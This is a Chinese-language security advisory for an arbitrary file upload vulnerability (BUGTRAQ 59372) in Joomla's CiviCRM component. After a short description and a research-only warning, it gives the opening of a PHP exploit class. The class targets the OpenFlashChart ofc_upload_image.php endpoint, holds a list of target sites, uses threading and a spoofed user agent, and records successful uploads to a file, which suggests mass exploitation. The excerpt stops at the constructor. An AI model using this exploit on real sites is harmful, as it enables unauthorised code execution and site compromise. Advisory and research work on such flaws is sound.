受影响系统:
Joomla! Civicrm
描述:
BUGTRAQ ID: 59372
Joomla Civicrm是组织成员关系管理系统。
Joomla Civicrm组件存在任意文件上传漏洞,攻击者可利用此漏洞上传任意文件到受影响系统,导致任意代码执行。
<*来源:miyachung
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
set_time_limit(0);
ob_start();
class exploit
{
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
private $filename;
private $url;
private $file_to_upload;
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
private $thread_maxsize;
private $site_list;
private $file_regex;
private $save_file = "uploaded.txt";
private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
private $timeout_sec = 20;
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
private $idnum = 31;
public function __construct($site_list,$filename,$thread,$regex)